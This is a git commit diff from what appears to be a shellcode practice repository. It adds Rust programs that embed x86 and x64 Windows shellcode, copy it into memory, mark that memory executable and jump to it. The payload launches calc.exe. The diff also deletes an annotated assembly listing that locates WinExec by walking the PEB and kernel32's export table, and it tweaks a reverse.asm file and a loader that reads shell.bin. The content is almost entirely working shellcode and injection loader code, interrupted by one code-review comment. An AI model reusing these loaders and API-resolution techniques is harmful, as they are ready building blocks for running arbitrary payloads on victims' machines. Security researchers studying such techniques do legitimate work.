
Commit 4256584

committed
Custom Shellcode Updates
Updated x64 and x86 shellcodes for testing purposes
1 parent fa9687b commit 4256584

6 files changed

+181
-110
lines changed


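--- a/Custom_Shellcode/calc_shellcode1.rs
+++ b/Custom_Shellcode/calc_shellcode1.rs
@@ -15,6 +15,7 @@ fn main() -> std::io::Result<()> {
 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01,
 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff, 0xd7,
 ];
+
 
 unsafe {
 let mem = VirtualAlloc(null_mut(), shellcode.len(), 0x1000 | 0x2000, 0x04);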
Lines changed: 42 additions & 0 deletions
@@ -0,0 +1,42 @@
1+
/*
2+
Windows x32 Calc.exe Shellcode
3+
*/
4+
5+
use std::ptr::null_mut;
6+
7+
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
8+
9+
fn main() -> std::io::Result<()> {
10+
11+
// windows x32 bit
12+
let shellcode: [u8; 53] = [
13+
0xeb, 0x1b, 0x5b, 0x31, 0xc0, 0x50, 0x31, 0xc0, 0x88, 0x43, 0x13, 0x53, 0xbb, 0xad, 0x23, 0x86,
14+
0x7c, 0xff, 0xd3, 0x31, 0xc0, 0x50, 0xbb, 0xfa, 0xca, 0x81, 0x7c, 0xff, 0xd3, 0xe8, 0xe0, 0xff,
15+
0xff, 0xff, 0x63, 0x6d, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x20, 0x2f, 0x63, 0x20, 0x63, 0x61, 0x6c,
16+
0x63, 0x2e, 0x65, 0x78, 0x65,
17+
];
18+
19+
20+
unsafe {
21+
let mem = VirtualAlloc(null_mut(), shellcode.len(), 0x1000 | 0x2000, 0x04);
22+
23+
if mem.is_null() {
24+
return Err(std::io::Error::last_os_error());
25+
}
26+
27+
std::ptr::copy_nonoverlapping(shellcode.as_ptr(), mem as *mut u8, shellcode.len());
28+
29+
let mut old_protect = 0;
30+
let result = VirtualProtect(mem, shellcode.len(), 0x40, &mut old_protect);
31+
32+
if result == 0 {
33+
return Err(std::io::Error::last_os_error());
34+
}
35+
36+
let func: extern "C" fn() = std::mem::transmute(mem);
37+
func();
38+
}
39+
40+
Ok(())
41+
}
42+
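Review bot: The `VirtualAlloc` and `VirtualProtect` calls on new lines 21 and 30 pass bare numbers (`0x1000 | 0x2000`, `0x04`, `0x40`) where the `winapi` crate the file already depends on names them; `use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_READWRITE, PAGE_EXECUTE_READWRITE};` and `VirtualAlloc(null_mut(), shellcode.len(), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)` say the same thing without a reader having to decode flag values, and the same applies to the x64 file in the next section (its new lines 113 and 122). The header comment on lines 1-3 names only the target and purpose; it should also record where the byte array came from (the assembler listing or build command it was produced from and the hash of the .bin it was extracted from) so that the 53 bytes can be re-derived and audited rather than taken on trust, which matters more because this commit also deletes a 108-line assembly listing below. Both new files appear to be complete within their sections.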
Lines changed: 134 additions & 0 deletions
@@ -0,0 +1,134 @@
1+
2+
/*
3+
Windows x64 Calc.exe Shellcode
4+
*/
5+
6+
use std::ptr::null_mut;
7+
8+
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
9+
10+
fn main() -> std::io::Result<()> {
11+
12+
let shellcode: [u8; 1342] = [
13+
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
14+
0x66, 0x9C, 0x50, 0x51, 0x52, 0x53, 0x55, 0x56, 0x57, 0x41, 0x50, 0x41, 0x51, 0x41,
15+
0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0xE8, 0x1F, 0x00,
16+
0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x41, 0x5B, 0x41, 0x5A,
17+
0x41, 0x59, 0x41, 0x58, 0x5F, 0x5E, 0x5D, 0x5B, 0x5A, 0x59, 0x58, 0x66, 0x9D, 0xFF,
18+
0x25, 0xBB, 0xFF, 0xFF, 0xFF, 0x56, 0x48, 0x8B, 0xF4, 0x48, 0x83, 0xE4, 0xF0, 0x48,
19+
0x83, 0xEC, 0x20, 0xE8, 0x05, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xE6, 0x5E, 0xC3, 0x48,
20+
0x83, 0xEC, 0x38, 0xE8, 0x20, 0x00, 0x00, 0x00, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00,
21+
0x6E, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x2E, 0x00, 0x64, 0x00,
22+
0x6C, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0xE8,
23+
0x8F, 0x02, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x83, 0x7C, 0x24, 0x20,
24+
0x00, 0x75, 0x07, 0xB8, 0x01, 0x00, 0x00, 0x00, 0xEB, 0x46, 0xE8, 0x08, 0x00, 0x00,
25+
0x00, 0x57, 0x69, 0x6E, 0x45, 0x78, 0x65, 0x63, 0x00, 0x5A, 0x48, 0x8B, 0x4C, 0x24,
26+
0x20, 0xE8, 0x33, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x83, 0x7C,
27+
0x24, 0x28, 0x00, 0x75, 0x07, 0xB8, 0x04, 0x00, 0x00, 0x00, 0xEB, 0x1A, 0xBA, 0x01,
28+
0x00, 0x00, 0x00, 0xE8, 0x09, 0x00, 0x00, 0x00, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65,
29+
0x78, 0x65, 0x00, 0x59, 0xFF, 0x54, 0x24, 0x28, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x38,
30+
0xC3, 0x48, 0x89, 0x54, 0x24, 0x10, 0x48, 0x89, 0x4C, 0x24, 0x08, 0x48, 0x83, 0xEC,
31+
0x78, 0x48, 0x8B, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x30,
32+
0x48, 0x8B, 0x44, 0x24, 0x30, 0x0F, 0xB7, 0x00, 0x3D, 0x4D, 0x5A, 0x00, 0x00, 0x74,
33+
0x07, 0x33, 0xC0, 0xE9, 0xFA, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x30, 0x48,
34+
0x63, 0x40, 0x3C, 0x48, 0x8B, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8,
35+
0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x40, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48,
36+
0x6B, 0xC0, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x40, 0x48, 0x8D, 0x84, 0x01, 0x88, 0x00,
37+
0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x83, 0x38,
38+
0x00, 0x75, 0x07, 0x33, 0xC0, 0xE9, 0xB2, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24,
39+
0x38, 0x8B, 0x00, 0x89, 0x44, 0x24, 0x18, 0x8B, 0x44, 0x24, 0x18, 0x48, 0x03, 0x84,
40+
0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x44, 0x24,
41+
0x10, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8B, 0x44, 0x24, 0x10,
42+
0x8B, 0x40, 0x1C, 0x89, 0x44, 0x24, 0x24, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x8B, 0x40,
43+
0x20, 0x89, 0x44, 0x24, 0x1C, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x8B, 0x40, 0x24, 0x89,
44+
0x44, 0x24, 0x20, 0x48, 0xC7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0D,
45+
0x48, 0x8B, 0x44, 0x24, 0x08, 0x48, 0xFF, 0xC0, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48,
46+
0x8B, 0x44, 0x24, 0x48, 0x48, 0x39, 0x44, 0x24, 0x08, 0x0F, 0x83, 0x3B, 0x01, 0x00,
47+
0x00, 0x8B, 0x44, 0x24, 0x1C, 0x48, 0x8B, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
48+
0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x8B, 0x4C, 0x24, 0x08, 0x48, 0x8D, 0x04, 0x88,
49+
0x48, 0x89, 0x44, 0x24, 0x58, 0x8B, 0x44, 0x24, 0x20, 0x48, 0x8B, 0x8C, 0x24, 0x80,
50+
0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x8B, 0x4C, 0x24, 0x08,
51+
0x48, 0x8D, 0x04, 0x48, 0x48, 0x89, 0x44, 0x24, 0x50, 0x8B, 0x44, 0x24, 0x24, 0x48,
52+
0x8B, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48,
53+
0x8B, 0x4C, 0x24, 0x50, 0x0F, 0xB7, 0x09, 0x48, 0x8D, 0x04, 0x88, 0x48, 0x89, 0x44,
54+
0x24, 0x60, 0x48, 0x8B, 0x44, 0x24, 0x58, 0x8B, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0x80,
55+
0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x28,
56+
0x48, 0xC7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0B, 0x48, 0x8B, 0x04, 0x24,
57+
0x48, 0xFF, 0xC0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x8B, 0x04, 0x24, 0x48, 0x8B, 0x8C,
58+
0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x0F, 0xBE, 0x00,
59+
0x85, 0xC0, 0x74, 0x45, 0x48, 0x8B, 0x04, 0x24, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48,
60+
0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x0F, 0xBE, 0x00, 0x85, 0xC0, 0x74, 0x2F, 0x48, 0x8B,
61+
0x04, 0x24, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48,
62+
0x8B, 0xC1, 0x0F, 0xBE, 0x00, 0x48, 0x8B, 0x0C, 0x24, 0x48, 0x8B, 0x54, 0x24, 0x28,
63+
0x48, 0x03, 0xD1, 0x48, 0x8B, 0xCA, 0x0F, 0xBE, 0x09, 0x3B, 0xC1, 0x74, 0x02, 0xEB,
64+
0x02, 0xEB, 0x97, 0x48, 0x8B, 0x04, 0x24, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x00, 0x00,
65+
0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x0F, 0xBE, 0x00, 0x85, 0xC0, 0x75, 0x2D,
66+
0x48, 0x8B, 0x04, 0x24, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B,
67+
0xC1, 0x0F, 0xBE, 0x00, 0x85, 0xC0, 0x75, 0x17, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x8B,
68+
0x00, 0x48, 0x8B, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B,
69+
0xC1, 0xEB, 0x07, 0xE9, 0xA8, 0xFE, 0xFF, 0xFF, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x78,
70+
0xC3, 0x48, 0x89, 0x4C, 0x24, 0x08, 0x48, 0x83, 0xEC, 0x58, 0x65, 0x48, 0x8B, 0x04,
71+
0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x44, 0x24,
72+
0x40, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8B, 0x44, 0x24,
73+
0x48, 0x48, 0x83, 0xC0, 0x20, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8B, 0x44, 0x24,
74+
0x38, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x44, 0x24, 0x30, 0xEB, 0x0D, 0x48, 0x8B, 0x44,
75+
0x24, 0x30, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x44, 0x24, 0x30, 0x48, 0x8B, 0x44, 0x24,
76+
0x38, 0x48, 0x39, 0x44, 0x24, 0x30, 0x0F, 0x84, 0xBF, 0x01, 0x00, 0x00, 0x48, 0x8B,
77+
0x44, 0x24, 0x30, 0x48, 0x83, 0xE8, 0x10, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x83,
78+
0x7C, 0x24, 0x28, 0x00, 0x74, 0x0C, 0x48, 0x8B, 0x44, 0x24, 0x28, 0x48, 0x83, 0x78,
79+
0x30, 0x00, 0x75, 0x05, 0xE9, 0x98, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x28,
80+
0x48, 0x8B, 0x40, 0x60, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0x83, 0x7C, 0x24, 0x10,
81+
0x00, 0x75, 0x02, 0xEB, 0xA4, 0x48, 0xC7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0xEB,
82+
0x0B, 0x48, 0x8B, 0x04, 0x24, 0x48, 0xFF, 0xC0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x8B,
83+
0x44, 0x24, 0x28, 0x0F, 0xB7, 0x40, 0x58, 0x48, 0x39, 0x04, 0x24, 0x0F, 0x83, 0x26,
84+
0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7,
85+
0x04, 0x48, 0x85, 0xC0, 0x74, 0x11, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x0C,
86+
0x24, 0x0F, 0xB7, 0x04, 0x48, 0x85, 0xC0, 0x75, 0x05, 0xE9, 0xFF, 0x00, 0x00, 0x00,
87+
0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x83,
88+
0xF8, 0x5A, 0x7F, 0x47, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F,
89+
0xB7, 0x04, 0x48, 0x83, 0xF8, 0x41, 0x7C, 0x35, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48,
90+
0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x83, 0xE8, 0x41, 0x83, 0xC0, 0x61, 0x89,
91+
0x44, 0x24, 0x20, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7,
92+
0x54, 0x24, 0x20, 0x66, 0x89, 0x14, 0x48, 0x0F, 0xB7, 0x44, 0x24, 0x20, 0x66, 0x89,
93+
0x44, 0x24, 0x08, 0xEB, 0x12, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24,
94+
0x0F, 0xB7, 0x04, 0x48, 0x66, 0x89, 0x44, 0x24, 0x08, 0x0F, 0xB7, 0x44, 0x24, 0x08,
95+
0x66, 0x89, 0x44, 0x24, 0x18, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x0C, 0x24,
96+
0x0F, 0xB7, 0x04, 0x48, 0x83, 0xF8, 0x5A, 0x7F, 0x47, 0x48, 0x8B, 0x44, 0x24, 0x10,
97+
0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x83, 0xF8, 0x41, 0x7C, 0x35, 0x48,
98+
0x8B, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x83, 0xE8,
99+
0x41, 0x83, 0xC0, 0x61, 0x89, 0x44, 0x24, 0x24, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x48,
100+
0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x54, 0x24, 0x24, 0x66, 0x89, 0x14, 0x48, 0x0F, 0xB7,
101+
0x44, 0x24, 0x24, 0x66, 0x89, 0x44, 0x24, 0x0A, 0xEB, 0x12, 0x48, 0x8B, 0x44, 0x24,
102+
0x10, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x66, 0x89, 0x44, 0x24, 0x0A,
103+
0x0F, 0xB7, 0x44, 0x24, 0x0A, 0x66, 0x89, 0x44, 0x24, 0x1C, 0x0F, 0xB7, 0x44, 0x24,
104+
0x18, 0x0F, 0xB7, 0x4C, 0x24, 0x1C, 0x3B, 0xC1, 0x74, 0x02, 0xEB, 0x05, 0xE9, 0xBC,
105+
0xFE, 0xFF, 0xFF, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7,
106+
0x04, 0x48, 0x85, 0xC0, 0x75, 0x1C, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x0C,
107+
0x24, 0x0F, 0xB7, 0x04, 0x48, 0x85, 0xC0, 0x75, 0x0B, 0x48, 0x8B, 0x44, 0x24, 0x28,
108+
0x48, 0x8B, 0x40, 0x30, 0xEB, 0x07, 0xE9, 0x24, 0xFE, 0xFF, 0xFF, 0x33, 0xC0, 0x48,
109+
0x83, 0xC4, 0x58, 0xC3,
110+
];
111+
112+
unsafe {
113+
let mem = VirtualAlloc(null_mut(), shellcode.len(), 0x1000 | 0x2000, 0x04);
114+
115+
if mem.is_null() {
116+
return Err(std::io::Error::last_os_error());
117+
}
118+
119+
std::ptr::copy_nonoverlapping(shellcode.as_ptr(), mem as *mut u8, shellcode.len());
120+
121+
let mut old_protect = 0;
122+
let result = VirtualProtect(mem, shellcode.len(), 0x40, &mut old_protect);
123+
124+
if result == 0 {
125+
return Err(std::io::Error::last_os_error());
126+
}
127+
128+
let func: extern "C" fn() = std::mem::transmute(mem);
129+
func();
130+
}
131+
132+
Ok(())
133+
}
134+
Lines changed: 0 additions & 108 deletions
@@ -1,108 +0,0 @@
1-
; Shellcode practice.
2-
; The goal is to locate and call WinExec from kernel32.dll without external dependencies dynamically....
3-
; Just a snippet by @5mukx...
4-
5-
[bits 64]
6-
7-
section .text
8-
global _start
9-
10-
_start:
11-
; Access PEB to locate kernel32.dll
12-
xor rbx, rbx ; set the rbx register to zero eg.. 5 ^ 5 = 0
13-
mov rbx, [gs: 0x60] ; rbx = PEB address (from gs segment, 0x60 offset)
14-
mov rbx, [rbx+0x18] ; rbx = PEB->Ldr (PEB_LDR_DATA)
15-
16-
; rbx = InMemoryOrderModuleList
17-
; The head of a doubly-linked list that contains the loaded modules for the process.
18-
; Each item in the list is a pointer to an LDR_DATA_TABLE_ENTRY structure
19-
add rbx, 0x20
20-
21-
; now i'm trying to traverse the InMemoryOrderModuleList to find kernel32.dll
22-
mov rbx, [rbx] ; rbx = 1st entery(ntdll.dll)
23-
mov rbx, [rbx] ; RBX = 2nd entry (kernelbase.dll)
24-
mov rbx, [rbx] ; RBX = 3rd entry (kernel32.dll)
25-
26-
mov rbx, [rbx+0x20] ; RBX = DllBase (base addr of kernel32.dll )
27-
mov r8, rbx
28-
29-
; trying to locate export table of kernel32.dll
30-
mov ebx, [r8+0x3c] ; EBX = e_lfanew (this is an offset to PE headers)
31-
add rbx, r8 ; RBX = PE header addr
32-
xor rcx, rcx ; 0
33-
add cl, 0x88 ; RCX = 0x88 (offset to export table RVA)
34-
mov ebx, [rbx+rcx] ; EBX = export table RVA
35-
add rbx, r8 ; RBX = export table address
36-
mov r9, rbx ; R9 = export table address ...
37-
38-
; get the addrs of export table arrays
39-
xor r10, r10 ; 0
40-
mov r10d, [r9+0x1c] ; R10 = AddressOfFunctions
41-
add r10, r8 ; R10 = AddressOfFunctions address
42-
xor r11, r11
43-
mov r11d, [r9+0x20] ; R11 = AddressOfNames RVA
44-
add r11, r8 ; R11 = AddressOfNames address
45-
xor r12, r12
46-
mov r12d, [r9+0x24] ; R12 = AddressOfNameOrdinals RVA
47-
add r12, r8 ; R12 = AddressOfNameOrdinals address
48-
49-
; finding WinExec function !
50-
xor rcx, rcx
51-
add cl, 7 ; RCX = 7 (length of "WinExec")
52-
xor rax, rax
53-
push rax ; Push null terminator
54-
mov rax, 0x00636578456E6957 ; RAX = "cexEniW\0" (WinExec, reversed)
55-
push rax ; Push function name to stack
56-
mov rbx, rsp ; RBX = pointer to "WinExec" string
57-
58-
call get_winapi_func ; Call function to resolve WinExec address
59-
mov r13, rax ; R13 = WinExec function address
60-
61-
; arguments for WinExec("calc.exe", SW_SHOWNORMAL)
62-
xor rcx, rcx
63-
xor rdx, rdx
64-
push rcx ; Push null terminator
65-
mov rcx, 0x6578652e636c6163 ; RCX = "exe.clac" (calc.exe, reversed) LIFO ...!
66-
push rcx ; Push command string to stack
67-
mov rcx, rsp ; RCX = pointer to "calc.exe" string
68-
mov rdx, 0x1 ; RDX = 1 (SW_SHOWNORMAL)
69-
70-
; align stack and call WinExec
71-
and rsp, -16 ; Align stack to 16 bytes
72-
sub rsp, 32 ; Allocate shadow space (Windows x64 convention)
73-
call r13 ; Call WinExec("calc.exe", 1)
74-
75-
get_winapi_func:
76-
; finding the function address from export table ...!
77-
; Input:
78-
;R8 = kernel32.dll base
79-
;R10 = AddressOfFunctions
80-
;R11 = AddressOfNames
81-
;R12 = AddressOfNameOrdinals
82-
;RBX = function name
83-
;RCX = name length
84-
; Output:
85-
;RAX = function address
86-
87-
xor rax, rax ; RAX = counter (index)
88-
push rcx ; Save name length
89-
90-
; looking through the functions in address of names
91-
loop:
92-
xor rdi, rdi ; 0
93-
mov rcx, [rsp] ; RCX = name length
94-
mov rsi, rbx ; RSI = function name ("WinExec")
95-
mov edi, [r11+rax*4] ; RDI = RVA of current function name
96-
add rdi, r8 ; RDI = address of function name
97-
repe cmpsb ; compare the function name with "WinExec"
98-
je resolve_func_addr ; If it's match, resolve address
99-
inc rax ; increment the counter
100-
jmp short loop ; continue the loop
101-
102-
resolve_func_addr:
103-
pop rcx ; Restore stack
104-
mov ax, [r12+rax*2] ; AX = ordinal from AddressOfNameOrdinals
105-
mov eax, [r10+rax*4] ; EAX = function RVA from AddressOfFunctions
106-
add rax, r8 ; RAX = function address (RVA + kernel32.dll base)
107-
ret ; return the function address ...
108-

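--- a/Custom_Shellcode/shellcode_extract/reverse.asm
+++ b/Custom_Shellcode/shellcode_extract/reverse.asm
@@ -5,7 +5,8 @@
 ; By @5mukx
 
 
-[BITS 32]
+BITS 32
+
 section .text
 global _start
 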
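--- a/Custom_Shellcode/shellcode_extract/src/main.rs
+++ b/Custom_Shellcode/shellcode_extract/src/main.rs
@@ -7,7 +7,7 @@ use std::ptr;
 fn main() -> std::io::Result<()> {
 println!("[+] Small Program to execute shellcode from bin and execute and display <>");
 
-let mut file = File::open("reverse.bin")?;
+let mut file = File::open("shell.bin")?;
 let mut shellcode = Vec::new();
 file.read_to_end(&mut shellcode)?;
 
@@ -53,3 +53,4 @@ fn main() -> std::io::Result<()> {
 
 Ok(())
 }
+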
